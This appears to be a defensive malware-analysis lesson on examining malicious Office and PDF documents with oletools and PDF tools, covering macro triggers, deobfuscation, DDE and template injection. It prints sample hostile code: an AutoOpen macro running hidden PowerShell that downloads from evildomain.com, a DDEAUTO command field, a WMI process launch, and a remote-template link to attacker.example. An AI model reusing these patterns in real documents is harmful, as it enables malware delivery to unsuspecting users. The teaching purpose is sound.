- Explain why Office documents remain the number one malware delivery vector and how attackers exploit user trust
- Understand the OLE2 Compound Binary Format and how it embeds VBA macro code, embedded objects, and metadata
- Identify common VBA macro triggers (AutoOpen, Document_Open, Workbook_Open) and their execution conditions
- Use the oletools suite (olevba, oleid, rtfobj, mraptor) to extract, analyze, and assess macro risk without opening the document
- Apply macro deobfuscation techniques to decode string concatenation, Chr() encoding, environment variable abuse, and WMI execution paths
- Analyze modern document threats including XLM 4.0 macros, DDE injection, and template injection via remote templates
- Perform basic PDF malware analysis targeting JavaScript payloads, embedded files, and launch actions
- Follow a safer analysis workflow that avoids direct document opening at every stage

Every phishing campaign in your inbox starts the same way: an email with an attachment. That attachment is almost always a document: a Word file, an Excel spreadsheet, a PDF. According to multiple annual threat reports, malicious Office documents account for over 40% of all malware delivery, more than executables, scripts, and archives combined. This lesson teaches you to dissect those documents without ever opening them.

## Why Office Documents Dominate Malware Delivery

Three factors make Office documents the perfect weapon:

| Factor | Why It Works |
|---|---|
| **Trust** | Users open documents every day: invoices, reports, contracts. A `.docx` feels safe in a way that a `.exe` never does. |
| **Built-in code execution** | VBA macros provide a full programming environment embedded inside the document. Microsoft designed this for automation; attackers repurposed it for payload delivery. |
| **Evasion** | Document files bypass many email gateways and endpoint protections that focus on executable files. Macros execute inside a trusted application (Word, Excel), inheriting its reputation. |

**Microsoft's mitigation timeline.** Microsoft began blocking macros in files downloaded from the internet by default in 2022 (Mark of the Web + VBA blocking). Attackers adapted with template injection, OneNote containers, ISO files, and other bypass techniques. The core analysis skills in this lesson apply regardless of which bypass technique is currently in vogue.

## OLE2 File Format: What Is Inside a .doc File?

The OLE2 Compound Binary Format (also called Compound File Binary Format) is a file system within a file. Think of a `.doc` file as a miniature FAT filesystem containing multiple "streams": named data blobs that hold document content, formatting, macros, embedded objects, and metadata.

| Stream | Contents |
|---|---|
| `WordDocument` | The document text and formatting |
| `Macros/VBA/ThisDocument` | VBA macro source code |
| `Macros/VBA/Module1` | Additional VBA modules |
| `\x01CompObj` | Application identification |
| `\x05SummaryInformation` | Document metadata (author, dates, etc.) |
| `ObjectPool/` | Embedded OLE objects (other files inside the document) |

Modern `.docx`/`.xlsx`/`.pptx` files use the Open XML format (a ZIP archive containing XML files). Their macro-enabled variants (`.docm`, `.xlsm`, `.pptm`) still store VBA in an OLE2 container embedded within the ZIP structure (`vbaProject.bin`). Malware authors frequently use the legacy `.doc`/`.xls` format specifically because the OLE2 binary format is harder to inspect casually.

## VBA Macro Triggers

Macros do not execute by themselves. They need a trigger. Attackers use auto-execution hooks that fire when the document is opened or closed:

| Trigger | Application | When It Fires |
|---|---|---|
| `AutoOpen()` | Word | When a `.doc` document is opened (legacy) |
| `Document_Open()` | Word | When a `.docm` or `.doc` document is opened |
| `Auto_Open()` | Excel | When a `.xls` workbook is opened (legacy) |
| `Workbook_Open()` | Excel | When a `.xlsm` or `.xls` workbook is opened |
| `AutoExec()` | Word | When Word starts (template-based) |
| `AutoClose()` | Word | When the document is closed (delayed execution) |
| `Document_Close()` | Word | When the document is closed |
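
Returning to the two container formats described in the OLE2 section, the sketch below shows one way to tell them apart from raw bytes alone. OLE2 compound files begin with the signature `D0 CF 11 E0 A1 B1 1A E1`, and Open XML files are ZIP archives that begin with `PK\x03\x04`. The names `identify_container` and `build_sample_ooxml` are hypothetical helpers invented for this illustration, and the sample archive is a stand-in, not a valid Office file.

```python
import io
import zipfile

OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # Compound File Binary signature
ZIP_MAGIC = b"PK\x03\x04"                       # ZIP local file header


def identify_container(data: bytes) -> str:
    """Classify raw document bytes without handing them to Office."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            names = archive.namelist()
        # Macro-enabled Open XML files carry the VBA project as an OLE2 blob.
        if any(name.lower().endswith("vbaproject.bin") for name in names):
            return "ooxml-with-vba"
        return "ooxml"
    return "unknown"


def build_sample_ooxml(with_vba: bool) -> bytes:
    """Build a tiny in-memory ZIP that mimics an Open XML layout (illustration only)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            archive.writestr("word/vbaProject.bin", OLE2_MAGIC + b"\x00" * 8)
    return buffer.getvalue()


print(identify_container(OLE2_MAGIC + b"\x00" * 504))
print(identify_container(build_sample_ooxml(with_vba=True)))
```

A check like this trusts the content rather than the extension, which matters because a file named `.docx` can still be a legacy OLE2 document.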

**AutoClose and Document_Close are sneaky.** Malware that triggers on document close evades sandboxes that only monitor the first few seconds after opening. If your sandbox opens the file, waits 60 seconds, and sees nothing, it marks the file clean. The payload fires when the sandbox closes the document. Always check for close-triggered macros.
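
As a minimal sketch of the check this callout recommends, the snippet below scans already-extracted VBA source text for the trigger names from the table and separates open-time hooks from close-time hooks. It assumes the macro source has been dumped to a string (for example from olevba output). The function name `find_triggers` and the sample macro are hypothetical.

```python
import re

# Trigger names taken from the table in this lesson (VBA is case-insensitive).
OPEN_TRIGGERS = {"autoopen", "document_open", "auto_open", "workbook_open", "autoexec"}
CLOSE_TRIGGERS = {"autoclose", "document_close"}

# Matches "Sub Name(" with an optional Private/Public modifier.
SUB_PATTERN = re.compile(
    r"^\s*(?:(?:Private|Public)\s+)?Sub\s+(\w+)\s*\(",
    re.IGNORECASE | re.MULTILINE,
)


def find_triggers(vba_source: str) -> dict:
    """Return the auto-execution procedures found, grouped by when they fire."""
    found = {"open": [], "close": []}
    for name in SUB_PATTERN.findall(vba_source):
        lowered = name.lower()
        if lowered in OPEN_TRIGGERS:
            found["open"].append(name)
        elif lowered in CLOSE_TRIGGERS:
            found["close"].append(name)
    return found


# Hypothetical macro that only fires when the document is closed.
SAMPLE = '''
Private Sub Document_Close()
    Shell "calc.exe", vbHide
End Sub

Sub Helper()
End Sub
'''

print(find_triggers(SAMPLE))
```

A result with an empty `open` list and a non-empty `close` list is the pattern that a short-lived sandbox run is most likely to miss.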

## The oletools Suite

oletools is a Python toolkit purpose-built for analyzing OLE2 files and VBA macros. It is the standard tool for document malware analysis in most SOC teams.

### Installation

```bash
# Install oletools (pre-installed on REMnux)
pip install oletools

# Verify installation
olevba --help
oleid --help
```

### oleid: Quick Identification

oleid performs a rapid triage of a document file, reporting whether it contains macros, encrypted content, external relationships, or other risk indicators:

```bash
$ oleid suspicious_invoice.doc
Filename: suspicious_invoice.doc
Indicator                     Value
----------------------------- ---------
File format                   OLE
Container format              OLE
Application name              Microsoft Office Word
Encrypted                     False
VBA Macros                    Yes
XLM Macros                    No
External Relationships        No
ObjectPool                    No
Flash objects                 0
```

The key fields: **VBA Macros: Yes** tells you there is code to extract. **External Relationships** would indicate template injection. **ObjectPool** would indicate embedded OLE objects.

### olevba: Extract and Deobfuscate VBA

olevba is the workhorse.
It extracts VBA macro source code, identifies suspicious keywords, and performs basic deobfuscation:

```bash
$ olevba suspicious_invoice.doc
VBA MACRO ThisDocument.cls
in file: suspicious_invoice.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
    Dim cmd As String
    cmd = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114)
    cmd = cmd & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)
    Dim url As String
    url = "http://evil" & "domain.com" & "/payload.exe"
    Shell cmd & " -c ""IEX(New-Object Net.WebClient).DownloadString('" & url & "')""", vbHide
End Sub
+----------+--------------------+-----------------------------------------------+
|Type      |Keyword             |Description                                    |
+----------+--------------------+-----------------------------------------------+
|AutoExec  |AutoOpen            |Runs when the Word document is opened          |
|Suspicious|Shell               |May run an executable file or a system command |
|Suspicious|Chr                 |May obfuscate strings (Chr decoding)           |
|Suspicious|vbHide              |May run a hidden process                       |
|IOC       |http://evildomain   |URL (potentially malicious)                    |
+----------+--------------------+-----------------------------------------------+
```

![oletools analysis workflow: oleid for triage, olevba for extraction, mraptor for risk assessment](https://cyberblue-academy-content.s3.us-east-2.amazonaws.com/courses/cyberbluesoc-academy/module-malware/lesson-ma-5/oletools-analysis-workflow.png)

### rtfobj: RTF Embedded Objects

RTF files can embed OLE objects that execute on open.
rtfobj extracts these:

```bash
$ rtfobj malicious_resume.rtf
File: malicious_resume.rtf
RTF Embedded Objects:
  id: 0
  format_id: 2 (Embedded)
  class name: 'Package'
  data size: 45312
  OLE Package:
    Filename: update.exe
    Source path: C:\Temp\update.exe
    Temp path: C:\Temp\update.exe

# Extract the embedded object for further analysis
$ rtfobj -s all malicious_resume.rtf
Saved object to: malicious_resume.rtf_object_0.bin
```

### mraptor: Macro Risk Assessment

mraptor performs a quick risk assessment: does the document auto-execute macros, write files, or execute commands?

```bash
$ mraptor suspicious_invoice.doc
FILE: suspicious_invoice.doc
Result: SUSPICIOUS
Flags: AutoExec, Write, Execute
- Auto-execution trigger: AutoOpen
- File write capability: Shell command
- Code execution: Shell function call
```

The three flags to watch: **AutoExec** (runs without user action beyond opening), **Write** (creates/modifies files), **Execute** (runs commands or processes).

## Macro Deobfuscation Techniques

Attackers obfuscate macro code to bypass static analysis and AV signatures.
Here are the most common techniques and how to decode them:

### String Concatenation

```vba
' Obfuscated
Dim s As String
s = "pow" & "ersh" & "ell" & ".e" & "xe"
' Deobfuscated: powershell.exe
```

### Chr() Encoding

```vba
' Obfuscated
s = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)
' Deobfuscated: powershell
' Decode manually: 112=p, 111=o, 119=w, 101=e, 114=r, 115=s, 104=h, 101=e, 108=l, 108=l
```

```python
# Quick Python decoder for Chr() chains
import re

code = 'Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)'
# Capture the number inside each Chr(...) call; the parentheses must be escaped
result = ''.join(chr(int(x)) for x in re.findall(r'Chr\((\d+)\)', code))
print(result)  # powershell
```

### Environment Variable Abuse

```vba
' Obfuscated: uses environment variables to avoid string detection
Dim path As String
path = Environ("COMSPEC")  ' Resolves to C:\Windows\system32\cmd.exe

' Or building paths dynamically (VBA strings do not escape backslashes)
path = Environ("APPDATA") & "\update.exe"
```

### WMI Execution

```vba
' Obfuscated: uses WMI to execute commands instead of Shell()
Dim objWMI As Object
Set objWMI = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
objWMI.Create "powershell.exe -enc JABjAGwA..."
' This avoids triggering rules that look for Shell() or CreateObject("WScript.Shell")
```

![Common macro deobfuscation techniques, from simple concatenation to WMI-based execution](https://cyberblue-academy-content.s3.us-east-2.amazonaws.com/courses/cyberbluesoc-academy/module-malware/lesson-ma-5/macro-deobfuscation-techniques.png)
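
String concatenation and Chr() encoding often appear mixed in a single expression. The following is a minimal sketch that folds such an expression into its final string. It assumes the expression contains only quoted literals and `Chr`/`ChrW` calls with numeric arguments; variables, function calls, and arithmetic inside `Chr()` are ignored. The name `fold_vba_string` is a hypothetical helper, not part of oletools.

```python
import re

# One operand of a VBA string expression: a quoted literal or a Chr(n)/ChrW(n) call.
# Inside a VBA literal, a doubled quote ("") stands for one literal quote character.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|ChrW?\$?\(\s*(\d+)\s*\)', re.IGNORECASE)


def fold_vba_string(expression: str) -> str:
    """Join the literals and Chr() calls of an expression in source order."""
    parts = []
    for literal, code in TOKEN.findall(expression):
        if code:
            parts.append(chr(int(code)))
        else:
            parts.append(literal.replace('""', '"'))
    return "".join(parts)


print(fold_vba_string('"pow" & "ersh" & "ell" & ".e" & "xe"'))
print(fold_vba_string('Chr(112) & Chr(111) & "wershell"'))
```

Because operators are skipped rather than parsed, this is only suitable for quick triage of simple chains; anything that depends on runtime values still needs emulation or manual tracing.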

**olevba handles most deobfuscation automatically.** Run `olevba --deobf` to get decoded strings, resolved Chr() sequences, and concatenated values. For heavily obfuscated macros, combine olevba output with manual Python scripting and ViperMonkey (a VBA emulator that executes macros in a sandbox).
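
One common case for the manual Python scripting mentioned above is a PowerShell `-enc` (EncodedCommand) argument like the one in the WMI example. PowerShell expects that argument to be Base64 over UTF-16LE text, so decoding takes two steps. This is a small sketch; `decode_powershell_enc` is a hypothetical helper name and the sample payload is a harmless command made up for illustration.

```python
import base64


def decode_powershell_enc(encoded: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 over UTF-16LE text)."""
    raw = base64.b64decode(encoded)
    return raw.decode("utf-16-le")


# Hypothetical sample: encode a harmless command the way PowerShell expects it.
sample = base64.b64encode("Write-Output 'hello'".encode("utf-16-le")).decode("ascii")

print(sample)
print(decode_powershell_enc(sample))
```

Decoding as plain UTF-8 instead would leave a NUL byte after every ASCII character, which is a quick visual hint that the payload is UTF-16LE.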

## Modern Document Threats

VBA macros are the classic attack, but modern threats have expanded beyond them:

### XLM 4.0 Macros (Excel)

XLM macros predate VBA and are stored in hidden Excel macro sheets rather than VBA modules. Many security tools miss them because they do not look like traditional macros:

```bash
# XLM macros live in hidden sheets, not VBA streams
# Recent olevba versions extract XLM macros by default
$ olevba suspicious_spreadsheet.xls

# Or use the dedicated tool, XLMMacroDeobfuscator
$ xlmdeobfuscator -f suspicious_spreadsheet.xls
```

| XLM Feature | Why It Is Dangerous |
|---|---|
| Stored in hidden sheets | Not visible in VBA editor; analysts miss them |
| No VBA stream | Tools scanning for VBA macros report "no macros found" |
| EXEC() and CALL() functions | Can execute arbitrary commands and DLL functions |
| Formula-based | Logic expressed as cell formulas, harder to read than VBA |

### DDE Injection (Dynamic Data Exchange)

DDE allows Office documents to pull data from other applications. Attackers abuse this to execute commands without any macros:

```
# DDE field in a Word document
{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -c IEX(...)" }

# The document has NO macros: oleid reports VBA Macros: No
# But opening it prompts "This document contains links to other data sources"
```

**DDE attacks have no macros to scan.** Traditional macro analysis tools report the document as clean. Look for DDE fields in the document XML (`word/document.xml` in .docx files) or use `msodde`, the oletools utility written specifically to find DDE links. Users see a prompt about "updating links" rather than a macro warning, which makes the social engineering more effective.
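
The manual check of `word/document.xml` can be sketched with the standard library alone. Word stores field instructions in `w:instrText` elements (or in the `w:instr` attribute of `w:fldSimple`), and an instruction may be split across several runs, so the fragments are joined before searching. This is a rough triage sketch, not a replacement for a dedicated tool: `find_dde_fields` and `build_sample_docx` are hypothetical names, the sample is a stand-in rather than a valid Word file, and joining all fragments in the document can merge unrelated fields into one string.

```python
import io
import re
import zipfile

INSTR_TEXT = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>", re.DOTALL)
SIMPLE_FIELD = re.compile(r'<w:fldSimple[^>]*\bw:instr="([^"]*)"')
DDE_KEYWORD = re.compile(r"\bDDE(AUTO)?\b", re.IGNORECASE)


def find_dde_fields(docx_bytes: bytes) -> list:
    """Return field instructions in word/document.xml that mention DDE or DDEAUTO."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        xml = archive.read("word/document.xml").decode("utf-8", errors="replace")
    # Attackers split keywords across runs, so join the fragments before matching.
    joined = "".join(INSTR_TEXT.findall(xml))
    candidates = [joined] + SIMPLE_FIELD.findall(xml)
    return [text.strip() for text in candidates if DDE_KEYWORD.search(text)]


def build_sample_docx(body_xml: str) -> bytes:
    """Wrap body XML in a minimal ZIP that mimics a .docx layout (illustration only)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("word/document.xml", "<w:document>" + body_xml + "</w:document>")
    return buffer.getvalue()


# Hypothetical field whose keyword is split across two runs.
MALICIOUS_BODY = (
    r'<w:r><w:instrText xml:space="preserve"> DDEA</w:instrText></w:r>'
    r'<w:r><w:instrText>UTO c:\\windows\\system32\\cmd.exe "/k calc.exe" </w:instrText></w:r>'
)

print(find_dde_fields(build_sample_docx(MALICIOUS_BODY)))
print(find_dde_fields(build_sample_docx("<w:r><w:t>Quarterly report</w:t></w:r>")))
```

The run-joining step is the important design choice here: a plain text search for `DDEAUTO` in the raw XML would miss the split keyword in the sample.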

### Template Injection

Template injection loads a remote template containing malicious macros. The document itself has no macros; it just references a URL. A representative relationship entry looks like this (the host name is a placeholder):

```xml
<!-- word/_rels/settings.xml.rels (illustrative; attacker.example is a placeholder host) -->
<Relationship Id="rId1"
  Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
  Target="http://attacker.example/template.dotm"
  TargetMode="External"/>
```

The attack flow:

1. User opens a clean-looking `.docx` (no macros, passes AV)
2. Word fetches the remote template from the attacker's server
3. The template contains VBA macros that execute

Detection: check for **External Relationships** in oleid output, or manually inspect the `_rels/` directories inside the docx ZIP file (typically `word/_rels/settings.xml.rels`) for relationships with `TargetMode="External"`.

## PDF Malware Analysis

PDFs can contain JavaScript, embedded files, and launch actions. While less common than Office malware, PDF-based attacks target organizations that have blocked Office macros.

### Key PDF Analysis Tools

| Tool | Purpose |
|---|---|
| `pdf-parser` | Parse PDF structure, extract streams and objects |
| `pdfid` | Quick triage: counts JavaScript, embedded files, launch actions |
| `peepdf` | Interactive PDF analysis framework |

### Quick PDF Triage with pdfid

```bash
$ pdfid suspicious_report.pdf
PDFiD 0.2.8 suspicious_report.pdf
 PDF Header: %PDF-1.7
 obj                   12
 endobj                12
 stream                 4
 endstream              4
 /Page                  1
 /JS                    2   <-- JavaScript present!
 /JavaScript            2   <-- JavaScript present!
 /OpenAction            1   <-- Runs on document open!
 /EmbeddedFile          1   <-- Contains embedded file!
 /Launch                0
 /AcroForm              0
```

Red flags: `/JS` or `/JavaScript` (embedded code), `/OpenAction` (auto-execute on open), `/EmbeddedFile` (file inside the PDF), `/Launch` (execute external application), `/AA` (additional actions).

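
To make the idea behind this kind of keyword triage concrete, the sketch below counts the red-flag names in raw PDF bytes. It is a deliberately simplified illustration and not how pdfid itself is implemented: it assumes the names appear literally and uncompressed, so it will miss names written with `#xx` hex escapes or hidden inside compressed object streams. `count_pdf_keywords` and the sample bytes are hypothetical.

```python
import re

KEYWORDS = [b"/JS", b"/JavaScript", b"/OpenAction", b"/AA", b"/EmbeddedFile", b"/Launch"]


def count_pdf_keywords(data: bytes) -> dict:
    """Count literal occurrences of risky PDF names in raw file bytes."""
    counts = {}
    for keyword in KEYWORDS:
        # A name ends at whitespace or a delimiter, so reject longer names
        # that merely start with the keyword.
        pattern = re.compile(re.escape(keyword) + rb"(?![A-Za-z0-9])")
        counts[keyword.decode("ascii")] = len(pattern.findall(data))
    return counts


# Hypothetical fragment of a PDF with an open action that runs JavaScript.
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /S /JavaScript /JS (app.alert(1)) >>\nendobj\n"
)

for name, count in count_pdf_keywords(SAMPLE_PDF).items():
    print(f"{name:<15}{count}")
```

Any non-zero count for `/OpenAction` together with `/JS` or `/JavaScript` is the combination worth extracting and reading next.
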
### Extracting PDF JavaScript

```bash
# Use pdf-parser to extract JavaScript streams
$ pdf-parser --search javascript suspicious_report.pdf
obj 8 0
 Type: /Action
 Contains stream
 /S /JavaScript
 /JS (stream content)

# Extract the stream
$ pdf-parser --object 8 --filter --raw suspicious_report.pdf > extracted_js.txt
```

## Safer Analysis Workflow

The golden rule of document malware analysis: **never open the document in its native application until you have exhausted every static analysis technique.**

| Step | Action | Tool |
|---|---|---|
| 1 | **Hash and check reputation** | sha256sum → VirusTotal lookup |
| 2 | **Quick triage** | oleid (Office) or pdfid (PDF) to identify risk indicators |
| 3 | **Extract macros** | olevba --deobf (Office) or pdf-parser (PDF) |
| 4 | **Assess risk** | mraptor: AutoExec + Write + Execute flags |
| 5 | **Extract embedded objects** | rtfobj (RTF) or pdf-parser (PDF) |
| 6 | **Deobfuscate manually** | Python scripting for remaining encoded strings |
| 7 | **Dynamic analysis (if needed)** | Open in sandboxed VM with network monitoring (Lesson 11.3-11.4 techniques) |
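
Step 1 of the table can also be done from Python when `sha256sum` is not available. The sketch below hashes a sample in fixed-size chunks so large files never have to fit in memory, and it reads the file purely as bytes so nothing is parsed or rendered. `sha256_of_stream` is a hypothetical helper name, and the in-memory stream stands in for a file opened with `open(path, "rb")`.

```python
import hashlib
import io


def sha256_of_stream(stream, chunk_size: int = 65536) -> str:
    """Return the hex SHA-256 of a binary stream, reading it in chunks."""
    digest = hashlib.sha256()
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        digest.update(chunk)
    return digest.hexdigest()


# Stand-in for a sample on disk; real use would pass open(path, "rb").
sample_stream = io.BytesIO(b"not a real document")
print(sha256_of_stream(sample_stream))
```

The resulting hex digest is the value to submit to a reputation service, which avoids uploading the sample itself.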

**Never open suspicious documents on your analysis workstation.** Even with macros disabled, documents can exploit parser vulnerabilities in Office or PDF readers. Always use a dedicated analysis VM. If you must view the document content visually, use LibreOffice in a Linux VM (different parser, different vulnerability surface) or convert to PDF/image first.

## Key Takeaways

- Office documents are the **#1 malware delivery vector** because users trust them, they contain built-in code execution (VBA), and they bypass many security controls designed for executables
- The **OLE2 format** is a file system within a file: macros, embedded objects, and metadata live in named streams that oletools can extract and inspect
- **Auto-execution triggers** (AutoOpen, Document_Open, Workbook_Open) fire when documents are opened; close triggers (AutoClose, Document_Close) evade sandboxes that only monitor opening
- **oletools is the standard SOC toolkit**: oleid for triage, olevba for extraction and deobfuscation, rtfobj for RTF objects, mraptor for risk assessment
- Common **deobfuscation patterns**: string concatenation, Chr() encoding, environment variable resolution, and WMI-based execution to avoid Shell() detection
- **Modern threats** extend beyond VBA: XLM 4.0 macros hide in spreadsheet cells, DDE injection has no macros at all, and template injection fetches remote payloads
- **PDF analysis** uses pdfid for triage and pdf-parser for stream extraction; watch for /JS, /OpenAction, /EmbeddedFile, and /Launch indicators
- The **safer analysis workflow** exhausts static techniques before dynamic analysis: hash → triage → extract → deobfuscate → sandbox (only if needed)

## What's Next

Put your document analysis skills to the test. In **Lab 11.5: Malicious Document Analysis**, you'll analyze real weaponized Office documents, extracting malicious macros, embedded objects, and obfuscated payloads using oletools and YARA to trace the complete infection chain.